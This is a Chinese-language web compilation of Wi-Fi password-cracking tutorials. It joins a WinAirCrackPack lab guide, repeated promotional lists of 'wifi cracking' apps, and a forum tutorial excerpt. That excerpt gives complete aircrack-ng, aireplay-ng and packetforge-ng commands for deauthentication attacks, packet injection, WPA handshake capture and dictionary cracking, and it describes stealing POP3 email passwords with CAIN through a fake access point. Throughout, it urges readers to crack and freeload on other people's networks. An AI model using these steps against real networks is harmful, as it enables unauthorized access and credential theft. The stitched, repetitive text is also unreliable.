如何用WINARCRACK破无线路由密码

WinAirCrackPack 破解无线路由密码软件 WinAirCrackPack工具包是一款无线局域网扫描和密钥破解工具，主要包括airodump和aircrack等工具。它可以监视无线网络中传输的数据，收集数据包，并能计算出WEP/WPA密钥。

2、实验环境系统组成

2.1 硬件环境

选用具有WEP和WPA加密功能的无线路由器或AP一台

带有迅驰无线网卡的笔记本电脑两台(分别定义为STA1和STA2，作为合法无线接入用户)

抓包无线网卡一块

ü笔记本电脑一台(定义为STA3，作为入侵者)

2.2 软件环境

入侵者STA3 :WinAirCrackPack工具包，

注意:STA3要开启在控制面板-管理工具-服务中开启Wireless Zero Config服务。

3、实验拓扑图

4、配置无线路由器(根据实际网络环境进行配置)

(1)STA1连接上无线路由器(默认未加密)。右键单击屏幕下的 图标，选择“查看可用的无线网络”，弹出如图1所示的窗口。

其中显示有多个可用的无线网络，双击TP-LINK连接无线路由器，一会儿就连接成功。

(2)打开IE浏览器，输入IP地址:192.168.1.1(无线路由器默认局域网IP地址)。

(3)登录无线路由器管理界面(用户名:admin,密码:admin)。

单击界面左侧的“网络参数”下的“LAN口设置”选项，设置“IP地址”为192.168.1.8并保存，如图4所示。

(4)打开IE浏览器，输入IP地址:192.168.1.8，重新登录无线路由器管理界面(注意本实验选择TP-LINK无线路由器，其他品牌产品如CISCO等均有类似配置选项)，单击界面左侧的“无线设置”下的“基本设置”选项。

1)选择“模式”为“54Mbps(802.11g)”;

2)选择“密钥格式”为“ASCII码”;

3)选择“密钥类型”为“64位”;

4)设置“密钥1”为“pjwep”;

5)单击“保存”。

(5)当无线路由器设置好WEP密钥后，STA1需要重新连接上无线路由器(输入的密钥与无线路由器设置的密钥相同)，一会儿就连接成功。

(6)打开IE浏览器，输入IP地址:192.168.1.8，重新登录无线路由器管理界面，单击界面左侧的“DHCP服务器”下的“DHCP服务”选项，单击“不启用”并保存,如图8所示，单击“系统工具”下的“重启路由器”对路由器进行重启。

5、破解WEP、WPA密钥的软件下载

STA3从网上下载用于破解密钥的软件，具体操作步骤如下:

(1)在Google搜索页面中输入“WinAircrackPack下载”进行搜索，如图9所示。

点击上述页面中“安全焦点:安全工具-WinAircrackPack.zip”，弹出以下页面。

(2)单击“下载”保存该软件,可解压到本地磁盘的任何位置(以下我们解压到E盘根目录下为例)。

6、安装抓包无线网卡

注:用于抓包无线网卡的驱动采用Atheros v4.2.1，该卡必须采用Atheros AR5001, AR5002, AR5004, AR5005 或 AR5006芯片组，下表的网卡均可使用，本实验我们采用Netgear 的108M无线网卡(型号:WG511T)。

(1)在STA3笔记本上安装抓包无线网卡驱动。插入无线网卡，弹出如图11所示的窗口。选择“否，暂时不”，单击“下一步”。

(2) 选择“从列表或指定位置安装”，单击“下一步”。

(3)选择“不要搜索”，单击“下一步”。

(4)单击“从磁盘安装”，在弹出的窗口中单击“浏览”，选择E:\WinAircrackPack\atheros421@(目录下的net5211文件，单击“打开”，然后单击“确定”，单击“下一步”，在安装的过程中弹出如图15所示的窗口。

7、破解WEP密钥

(1)让STA1和STA2重新连接上无线路由器。

(2)在STA3笔记本电脑上运行airodump，该工具用来捕获数据包，按提示依次选择“16”:破解所用无线网卡的序号;

“a”，选择芯片类型，这里选择atheros芯片;

“6”，信道号，一般1、6、11是常用的信道号，选择“0”可以收集全部信道信息;

“testwep”(该输入文件名可任意);

“y”，破解WEP时候选择“y”，破解WPA时选择“n”。

(3)回车后，进入以下界面。

(4)当该AP的通信数据流量极度频繁(比如可以采用STA1与STA2对拷文件来产生数据流量)，“Packets”所对应的数值增长速度就会越大。当大概抓到30万(如采用104位RC4加密需要抓到100万包)“Packets”时关闭airodump窗口，启动 WinAircrack。

(5)点击左侧的“General”进行设置，选择加密类型为“WEP”，添加捕获的文件(testwep.ivs)。

(6)点击左侧的“Advanced”进行设置，选择“Aircrack”所在的位置。

(7)全部设置完后，点击右下角的“Aircrack the key”按钮弹出以下窗口。

(8)选择要破解网络的BSSID(本实验选择“1”)，回车得到最终WEP密钥。

8、破解WPA密钥

(1)修改无线路由器的加密类型和加密方法，并设置为WPA-PSK认证和TKIP加密方式。

(2)在STA3笔记本上运行airodump，该工具用来捕获数据包，按提示依次选择“16”，“a”，“6”，“testwpa”(该输入文件名可任意)，“n”。

(3)回车后，进入以下界面

(4)让STA1重新连接上无线路由器，airodump将捕获一个无线路由器与STA1四次握手的过程。

(5)启动WinAircrack。

(6)点击左侧的“General”进行设置，选择加密类型为“WPA-PSK”，添加捕获的文件(testwpa.cap)。

(7)点击左侧的“Wpa”进行设置，选择一个字典文件(口令字典可下载:例如lastbit.com/dict.asp)。

(8)全部设置完后，点击右下角的“Aircrack the key”按钮弹出以下窗口，可知已经捕获到一次握手的过程。

(9)选择要破解网络的BSSID(本实验选择“2”)，回车后经过几分钟的计算，最终得到WPA密钥。

9、破解密钥后对网络的危害一例(伪造AP)

一旦入侵者知道了无线网络的WEP或WPA密钥，就可以连接到本地局域网内，这样入侵者就享有与正常接入用户一样对整个网络访问的权限，进行深度攻击。入侵者可以利用IPBOOK,SuperScan 等类似这样的工具扫描局域网内的计算机，计算机里面的文件、目录、或者整个的硬盘驱动器能够被复制或删除，甚至其他更坏的情况诸如键盘记录、特洛伊木马、间谍程序或其他的恶意程序等等能够被安装到你的系统中，这样后果是非常严重的。

(1)简介

当WEP或WPA密码被破解后，入侵者可能用该密码和其他无线接入点(AP)构造一个假网络，当伪装AP的信号强于正常AP或用户靠近伪装 AP时，正常用户会很自然的接入到该假网络中，对于用户本身来说是感觉不到该网络的，就在用户正常收发邮件时，我们可以用类似CAIN这样的工具进行POP3、telnet等口令的破解等攻击。

(2)POP3口令破解

1)打开CAIN。

2)点击菜单栏“Configure”弹出以下窗口。

3)选择一个将用于抓包的网络适配器，点击“确定”，选择“ ”和“ ”，然后点击“ ”开始监控抓包。

4)正常用户开始收邮件，该软件可以对邮箱的登陆名和密码进行捕获。

(3)被破解后的危害

当黑客窃取了你的邮箱的用户名、密码、POP3服务器和SMTP服务器的IP地址后，就可以直接访问你的邮箱，你的邮件信息将完全暴露在黑客面前。

使用的情况破解一个64位加密的密码大概4小时，抓包3小时，真正破解只花了55分钟，当然了，如果是128位的密码时间就长了估计需要四倍的时间，不过采用128位加密的非常非常少见，10个中也未必有1个，如果你那有几个无线网络那你就挑容易的来吧，如果选择余地少的话那么花费十几个小时破解也是划算的，一旦破解估计相当长时间可以使用，比较128位加密的密码不是能够经常换的，不然主人也未必记得住，呵呵。

破加密wifi的软件

破加密wifi的软件如下：

推荐一：wifi万能钥匙

wifi万能钥匙是一款手机wifi密码破解软件，该软件的大小为7.7MB，是一款自动获取周边wifi热点信息并可以对部分wifi热点信息进行密码破解并建立连接的手机必备工具。一般来说，该款wifi密码破解软件可支持系统为android或者iOS所有手机。目前，wifi万能钥匙可以说是所有wifi密码破解软件中最具权威和最基础的一款软件。值得一提的是，目前wifi万能钥匙还具有着其他软件所没有的省电功能。

推荐二：ApWiFi软件破解版

ApWiFi软件破解版是由入apwifi免费版官方网站所提供的一款免费的专门为笔记本电脑所设计的一款wifi密码破解软件。该款软件是一款专门为了实现网络共享的软件，其最大特点是下载、安装以及使用方法都极为简单，是目前笔记本电脑实现网络共享的首选软件。但是该款wifi密码破解软件有一个致命缺点就是wifi感应距离和范围较小。

推荐三：wifi伴侣

wifi伴侣是一款免费连接wifi热点信息并可以对部分wifi热点信息进行密码破解的软件，目前，wifi伴侣这一款wifi密码破解软件被行业内称为是我国国内最优秀的免费wifi密码破解软件，而且其还被众多网虫们称作是蹭网神器。值得一提的是，该款软件还具有积分功能，也就是软件使用过程中的破解较难破解wifi所需要用到的“歪点”。

什么软件wifi密码破解最强

破解wifi密码最强的软件：

1、wifi万能钥匙

wifi万能钥匙是一款手机wifi密码破解软件，该软件的大小为7.7MB，是一款自动获取周边wifi热点信息并可以对部分wifi热点信息进行密码破解并建立连接的手机必备工具。一般来说，该款wifi密码破解软件可支持系统为android或者iOS所有手机。目前，wifi万能钥匙可以说是所有wifi密码破解软件中最具权威和最基础的一款软件。

2、ApWiFi软件破解版

ApWiFi软件破解版是由入apwifi免费版官方网站所提供的一款免费的专门为笔记本电脑所设计的一款wifi密码破解软件。该款软件是一款专门为了实现网络共享的软件，其最大特点是下载、安装以及使用方法都极为简单，是目前笔记本电脑实现网络共享的首选软件。但是该款wifi密码破解软件有一个致命缺点就是wifi感应距离和范围较小。

3、wifi伴侣

wifi伴侣是一款免费连接wifi热点信息并可以对部分wifi热点信息进行密码破解的软件，目前，wifi伴侣这一款wifi密码破解软件被行业内称为是我国国内最优秀的免费wifi密码破解软件，而且其还被众多网虫们称作是蹭网神器。值得一提的是，该款软件还具有积分功能，也就是软件使用过程中的破解较难破解wifi所需要用到的“歪点”。

4、WebCrack4路由器密码破解软件

爆破之前我们需要准备一个用户名文件和字典文件我都准备好了用户名文件一般路由器用户名都是admin今天我这里的路由也是这是一个常见的弱口令的字典关于字典的制作大家可以搜索教程，好了速度非常快已经破解完了看结果，在发现密码那里。

5、幻影wifi密码破解电脑版

幻影wifi密码破解电脑版是一款可以破解附件无线路由wifi密码的软件，从而让你可以轻松上网，绝对是一款蹭网最好的神器，幻影wifi电脑版字典破解方法一个一个尝试，虽然破解的速度不是很快但是绝对是100%破解wifi密码的一款软件，想要随时随地免费上网的朋友记得下载一个，本站提供幻影wifi电脑版下载。

请教怎么破解无线瘦ap的后台登录密码？

一般可以用软件破解AP密码：

这里举常用的万能钥匙及BT3破解方法：

一、使用WIFI伴侣破解AP密码：

1、用户在使用wifi伴侣过程中，首先需要打开移动数据开关，不然是无法使用移动数据网络的；

2、接着打开WiFi伴侣，这时候wifi伴侣会开始使用移动数据网络，不过耗费的流量很少；

3、接下来打开wifi开关，移动伴侣是通过wifi来连接移动wifi热点的，所以这个必须打开；

4、点击发现的热点，如果用户不确定自己周围是否有移动热点网络，可以百度下热点区域；

5、连接到热点网络，还有计时功能，连接成功后，我们关闭移动数据开关，这样可以避免使用的是运营商的网络。

6、用户可以开始免流量免费上网；

二、使用BT3破解AP密码（有些软件试了效果不行，效果好一点的当属BT3破解）：

如果破解WPA格式的无线网络密码~~

WPA破解详细教程

破解 WPA 的前提：必须要有合法无线客户端

WPA 破解的原理：

利用Deauth验证攻击。也就是说强制让合法无线客户端与AP被断开，当它被从WLAN 中断开后，这个无线

客户端会自动尝试重新连接到AP上，在这个重新连接过程中，数据通信就产生了，然后利用airodump捕获

一个无线路由器与无线客户端四次握手的过程，生成一个包含四次握手的cap包。然后再利用字典进行暴力

破解。

1． 激活网卡，并让其工作于11信道

Airmon-ng start wifi0 11

2．捕获11信道的cap包，并保存cap包为123.cap

Airodump-ng –w 123 –c 11 wifi0

上图可以看出采用了WPA加密方式，并且有一个0016b69d10ad合法的无线客户端。

3. 进行Deauth验证攻击，强制断开合法无线客户端和AP直接的连接，使其重新进行连接

aireplay-ng -0 10 -a ap mac -c my mac wifi0

解释：-0指的是采取Deautenticate攻击方式，后面为发送次数。-c建议还是使用，效果会更好，这个后面跟

的是监测到的合法的已连接的客户端MAC地址

注意上图红色部分，-c后面为合法无线客户端的MAC地址

Deauth攻击往往并不是一次攻击就成功，为确保成功截获需要反复进行（WPA破解不用等到数据Data达到

几万，因为它只要一个包含WPA4次握手验证包就可以了）。如果成功捕获会出现下图红色部分的提示

中国无线论坛中卫出品

AnywhereWLAN!! 25

这时如果输入dir就可以在root目录下看到名为123.cap的握手包了。

得到握手包以后就可以用字典直接破解

首先将在windows下用字典工具生成的字典（例password.txt）拷贝到root目录下

在BT3桌面双击system然后出现下图。

图中左边红色就为root目录，图中红色存储介质双击打开以后就看到你的每个硬盘的分区了。可以进入硬

盘分区右键拷贝，然后进入root目录右键粘贴。如下图红色部分

目前WPA 的破解主要还是基于暴力破解和字典破解，暴力破解和字典破解的一个共性就是“耗时、费力、

运气”所以往往有时候你花了很多时间但还是破不了，这时候希望大家还是要接受这样一个残酷的现实。

中国无线论坛中卫出品

AnywhereWLAN!! 26

破解方式一：用Cap数据包直接暴力破解

从破解难度上讲WEP 是很容易破解的，只要你收集足够的Cap 数据包就肯定可以破解。WPA 的破解需要

有好的密码字典配合才能完成，复杂的WPA密码可能几个月也破解不出来。

输入：aircrack-ng -z –b ap mac 123*.cap

123 是前面所获得的握手包的文件名。系统会自动在你输入的文件名后加上-01、-02（如果数据包太多，系

统会自动分成几个文件存储并自动命名，可以使用ls查看），输入123*是打开所有123相关的cap文件。

常见问题：步骤2中收集数据包已达30W，无法破解密码。可能系统自动分成了几个文件贮存cap包。

如输入123-01.cap破解可能导致破解不成功，建议使用123*.cap选择所有的cap包进行破解。

中国无线论坛中卫出品

AnywhereWLAN!! 27

破解方式二. 挂字典破解

一．直接在BT3中挂字典破解

aircrack-ng –w password.txt –b ap mac 123.cap

参数说明：passwrod.txt为字典名称123.cap为步骤2中获得的握手信息包

耗时1分31秒获得WPA密码，如下图

从上图可以看出破解用时1分31秒，速度149.91K/S

注：本教程只为了描述破解的过程。我是做了个256K的小字典，事先把密码已经加到字典里了。

二．也可以把包含4次握手的CAP数据包拷贝到硬盘下在WIN下用WinAircrack挂字典破解。

中国无线论坛中卫出品

AnywhereWLAN!! 28

如上图 Encryption type处选择WPA-PSK，下面capture files处导入抓取的握手包123.cap

然后选择WPA选项，如下图

在上图中Dictionary file处导入字典文件password.txt。然后点击右下角的Aircrack the key

中国无线论坛中卫出品

AnywhereWLAN!! 29

然后出现下图提示

上图，选择1后回车，然后开始破解。成功破解如下图

从上图可以看出破解用时54秒，速度251.73K/S(比BT3下要快)

中国无线论坛中卫出品

AnywhereWLAN!! 30

三．通过airolib构建WPA table实现WPA线速破解

WPA的字典破解除了直接挂字典破解外，另外一种就是用airolib将字典构造成WPA table然后再用aircrac

进行破解。

构建WPA table就是采用和WPA加密采用同样算法计算后生成的Hash 散列数值，这样在需要破解的时候直

接调用这样的文件进行比对，破解效率就可以大幅提高。

先讲通过airolib构建WPA table

WPA table具有较强的针对ssid的特性。

1. 在构建WPA table之前需要准备两个文件：一个是ssid列表的文件ssid.txt，一个是字典文件

password.txt。下图为我的文件

大家可以看到两个txt的文件，ssid记事本里是ssid的列表，你可以增加常见的ssid进去，后面的passwrod

就是字典文件了。

2. 把这ssid.txt和password.txt还有上面抓到的握手包123.cap这三个文件拷贝到root目录下方便使用。

见下图

3.开始利用airolib-ng来构建WPA table了。构建wpa table保存的名字为wpahash（下同）

第一步，如下图

airolib-ng wpa --import essid ssid.txt

中国无线论坛中卫出品

AnywhereWLAN!! 31

第二步，如下图

airolib-ng wpa --import passwd password.txt

第三步，如下图

airolib-ng wpa --clean all

第四步，如下图

airolib-ng wpa --batch

注：这一步要等很久（视字典大小而定，我256K的字典等了有15分钟）

4. 用aircrack来利用WPA table进行破解

Aircrack-ng –r wpahash 123.cap

选择1以后将开始破解。

中国无线论坛中卫出品

AnywhereWLAN!! 32

成功破解将如下图所示

从上图中可以看出耗时00:00:00反正不超过1秒钟，速度42250.00K/S

大家也看到了三种破解方式，直接挂字典中在win下用WinAircrack破解是速度比在BT3下要快。直接挂字典

破解不超过1分钟就破出了密码；利用WPA table破解速度虽然不到一秒，但是构建WPA table却耗费了15分

钟。构建WPA table是很耗时的，但是构建出了包括常见ssid的和相对较大字典的WPA table的话，以后破

解的速度将大大降低。当然没有万能的字典，如果有万能的字典，再构建出一个常见ssid的WPA table的话

那这个预运算数据库是超级超级庞大的。

注：WIN平台下的CAIN软件中的破解器也可用于WEP和WPA的基于暴力和字典的破解，但是其破解速度很慢，

相比aircrack-ng而言不具实用价值。

中国无线论坛中卫出品

AnywhereWLAN!! 33

Aireplay-ng的6种攻击模式详解

-0 Deautenticate 冲突模式

使已经连接的合法客户端强制断开与路由端的连接，使其重新连接。在重新连接过程中获得验证数据包，

从而产生有效ARP request。

如果一个客户端连在路由端上，但是没有人上网以产生有效数据，此时，即使用-3 也无法产生有效ARP

request。所以此时需要用-0 攻击模式配合，-3 攻击才会被立刻激活。

aireplay-ng -0 10 –a ap mac -c my mac wifi0

参数说明：

【-0】：冲突攻击模式，后面跟发送次数（设置为0，则为循环攻击，不停的断开连接，客户端无法正常上

网）

【-a】：设置ap的mac

【-c】：设置已连接的合法客户端的mac。如果不设置-c，则断开所有和ap连接的合法客户端。

aireplay-ng -3 -b ap mac -h my mac wifi0

注：使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器

-1 fakeauth count 伪装客户端连接

这种模式是伪装一个客户端和AP进行连接。

这步是无客户端的破解的第一步，因为是无合法连接的客户端，因此需要一个伪装客户端来和路由器相连。

为让AP接受数据包，必须使自己的网卡和AP关联。如果没有关联的话，目标AP将忽略所有从你网卡发

送的数据包，IVS 数据将不会产生。用-1 伪装客户端成功连接以后才能发送注入命令，让路由器接受到注

入命令后才可反馈数据从而产生ARP包。

aireplay-ng -1 0 –e ap essid -a ap mac -h my mac wifi0

参数说明：

【-1】：伪装客户端连接模式，后面跟延时

【-e】：设置ap的essid

【-a】：设置ap的mac

【-h】：设置伪装客户端的网卡MAC（即自己网卡mac）

-2 Interactive 交互模式

这种攻击模式是一个抓包和提数据发攻击包，三种集合一起的模式

1．这种模式主要用于破解无客户端，先用-1建立虚假客户端连接然后直接发包攻击

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap mac -h my mac wifi0

参数说明：

【-2】：交互攻击模式

【-p】设置控制帧中包含的信息（16进制），默认采用0841

【-c】设置目标mac地址

【-b】设置ap的mac地址

【-h】设置伪装客户端的网卡MAC（即自己网卡mac）

2．提取包，发送注入数据包

aireplay-ng -2 –r file -x 1024 wifi0

发包攻击.其中，-x 1024 是限定发包速度，避免网卡死机，可以选择1024。

中国无线论坛中卫出品

AnywhereWLAN!! 34

-3 ARP-request 注入攻击模式

这种模式是一种抓包后分析重发的过程

这种攻击模式很有效。既可以利用合法客户端，也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客

户端那一般需要等几分钟，让合法客户端和ap 之间通信，少量数据就可产生有效ARP request 才可利用-3

模式注入成功。如果没有任何通信存在，不能得到ARP request.，则这种攻击就会失败。如果合法客户端和

ap之间长时间内没有ARP request，可以尝试同时使用-0 攻击。

如果没有合法客户端，则可以利用-1 建立虚拟连接的伪装客户端，连接过程中获得验证数据包，从而产生

有效ARP request。再通过-3 模式注入。

aireplay-ng -3 -b ap mac -h my mac -x 512 wifi0

参数说明：

【-3】：arp注入攻击模式

【-b】：设置ap的mac

【-h】：设置

【-x】：定义每秒发送数据户包的数量，但是最高不超过1024，建议使用512（也可不定义）

-4 Chopchop 攻击模式，用以获得一个包含密钥数据的xor 文件

这种模式主要是获得一个可利用包含密钥数据的xor 文件，不能用来解密数据包。而是用它来产生一个新

的数据包以便我们可以进行注入。

aireplay-ng -4 -b ap mac -h my mac wifi0

参数说明：

-b：设置需要破解的AP的mac

-h：设置虚拟伪装连接的mac（即自己网卡的mac）

-5 fragment 碎片包攻击模式用以获得PRGA(包含密钥的后缀为xor 的文件)

这种模式主要是获得一个可利用PRGA，这里的PRGA 并不是wep key数据，不能用来解密数据包。而是

用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标AP重新广播包，当AP重广播

时，一个新的IVS将产生，我们就是利用这个来破解

aireplay-ng -5 -b ap mac -h my mac wifi0

【-5】：碎片包攻击模式

【-b】：设置ap的mac

【-h】：设置虚拟伪装连接的mac（即自己网卡的mac）

中国无线论坛中卫出品

AnywhereWLAN!! 35

Packetforge-ng：数据包制造程序

Packetforge-ng mode options

Mode

【-0】：伪造ARP包

packetforge-ng -0 -a ap mac -h my mac wifi0 –k 255.255.255.255 -l 255.255.255.255

–y.xor file -w mrarp

参数说明：

【-0】：伪装arp数据包

【-a】：设置ap的mac

【-h】设置虚拟伪装连接的mac（即自己的mac）

【-k】ip[:port]说明：设置目标文件IP和端口

【-l】ip[:port]说明：设置源文件IP和端口

【-y】file说明：从xor 文件中读取PRGA。后面跟xor 的文件名。

【-w】设置伪装的arp包的文件名

Aircrack-ng：WEP 及WPA-PSK key 破解主程序

Aircrack-ng [optin] .cap/.ivs file

Optin

aircrack-ng -n 64 -b ap mac name-01.ivs

参数说明：

【-n】：设置WEP KEY 长度（64/128/152/256/512）

aircrack-ng -x -f 2 name-01h.cap

参数说明：

【-x】：设置为暴力破解模式

【-f】：设置复杂程度，wep密码设置为1，wpa 密码设置为2

aircrack-ng -w password.txt ciw.cap

【-w】：设置为字典破解模式，后面跟字典文件，再后面跟是我们即时保存的那个捕获到WPA 验证的抓包

文件。

中国无线论坛中卫出品

AnywhereWLAN!! 36

常见问题荟萃

问题1：我在启动bt3 的时候，输入startx黑屏

解答：在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会，然后出来提示符再输入startx 可进入

win窗口；当实在不能进入win窗口的时候你也可以直接在提示符下输入各破解命令，同时可用alt+f1 打开

一个shell，alt+f2 打开第二个shell，alt+f3 打开第三个等。关闭窗口用PRINT SCREEN 键

问题2：在BT3中打开kismet 的时候窗口一闪就没了。

解答：首先加载驱ifconfig -a rausb0 开始网卡监听:airmon-ng start rausb0。找到/usr/local/etc/kismet.conf

打开此文件在channelsplit=true下面加入一行source=rt2500,rausb0,monitor

注： wusb54g v4一定是rt2500 ,不是加载驱动时显示的rt2570。

3945 的兄弟加入source=ipw3945,eth0,IPW3945